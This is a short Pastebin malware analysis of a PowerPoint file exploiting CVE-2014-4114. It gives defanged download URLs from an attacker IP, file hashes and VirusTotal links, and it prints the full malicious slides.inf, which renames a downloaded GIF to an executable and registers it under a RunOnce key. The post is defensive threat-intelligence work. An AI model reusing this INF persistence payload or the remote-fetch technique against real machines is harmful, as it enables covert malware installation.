Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- quick and dirty analysis of PPTX using CVE-2014-4114:
- sample of the file thanks to @artem_i_baranov pptx/pptsx.
- https://www.virustotal.com/en/file/70b8d220469c8071029795d32ea91829f683e3fbbaa8b978a31a0974daee8aaf/analysis/
- after opening the 2 of the following files are being download:
- hxxp://94[.]185[.]85[.]122/public/slide1[.]gif MD5: 8a7c30a7a105bd62ee71214d268865e3
- https://www.virustotal.com/en/file/0fda6c118fb7dc946440cb9225e32ab1825d87d4f088bb75a6eab7cef35433bc/analysis/
- 94.185.85.122/public/slides.inf MD5: 8313034e9ab391df83f6a4f242ec5f8d
- content of slides.inf:
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ; 61883.INF
- ; Copyright (c) Microsoft Corporation. All rights reserved.
- [Version]
- Signature = "$CHICAGO$"
- Class=61883
- ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
- Provider=%Msft%
- DriverVer=06/21/2006,6.1.7600.16385
- [DestinationDirs]
- DefaultDestDir = 1
- [DefaultInstall]
- RenFiles = RxRename
- AddReg = RxStart
- [RxRename]
- slide1.gif.exe, slide1.gif
- [RxStart]
- HKLM,Software\Microsoft\Windows\CurrentVersion\RunOnce,Install,,%1%\slide1.gif.exe
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- It seems that the author of this attack worked hard to develop it but then used highly detected dropper, seems to be related to black energy:
- http://www.eset.com/int/about/press/articles/article/eset-research-ukraine-and-poland-targeted-by-sophisticated-blackenergy-trojan/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement